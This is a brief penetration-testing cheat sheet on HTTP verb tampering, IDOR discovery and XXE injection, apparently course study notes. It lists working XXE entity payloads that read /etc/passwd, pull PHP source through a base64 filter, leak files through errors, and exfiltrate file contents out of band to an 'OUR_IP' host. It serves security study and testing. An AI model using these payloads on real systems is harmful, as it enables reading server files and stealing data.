1 min read
HTTP Verb Tampering
HTTP Method
HEADPUTDELETEOPTIONSPATCH
| Command | Description |
|---|---|
-X OPTIONS | Set HTTP Method with Curl |
IDOR
Identify IDORS
- In
URL parameters & APIs - In
AJAX Calls - By
understanding reference hashing/encoding - By
comparing user roles
| Command | Description |
|---|---|
md5sum | MD5 hash a string |
base64 | Base64 encode a string |
XXE
| Code | Description |
|---|---|
<!ENTITY xxe SYSTEM "http://localhost/email.dtd"> | Define External Entity to a URL |
<!ENTITY xxe SYSTEM "file:///etc/passwd"> | Define External Entity to a file path |
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php"> | Read PHP source code with base64 encode filter |
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>"> | Reading a file through a PHP error |
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>"> | Reading a file OOB exfiltration |